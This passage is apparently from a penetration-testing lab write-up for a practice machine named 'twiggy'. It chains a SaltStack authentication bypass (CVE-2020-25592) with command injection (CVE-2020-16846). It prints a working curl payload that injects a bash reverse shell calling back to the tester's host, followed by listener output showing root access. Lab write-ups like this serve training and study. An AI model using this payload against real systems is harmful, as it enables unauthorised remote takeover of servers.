RCE
Remote Code Execution is achievable by chaining authentication bypass with CVE-2020-25592, and OS command injection with CVE-2020-16846
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ curl -i $IP:8000/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|bash -i >& /dev/tcp/192.168.45.192/8000 0>&1 #"}'Sending the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ nnc 8000
listening on [any] 8000 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.113.62] 54112
bash: no job control in this shell
[root@twiggy /]# whoami
whoami
root
[root@twiggy /]# hostname
hostname
twiggy
[root@twiggy /]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:65:1e brd ff:ff:ff:ff:ff:ff
inet 192.168.113.62/24 brd 192.168.113.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the root account via chaining CVE-2020-25592 and CVE-2020-16846.
System level compromise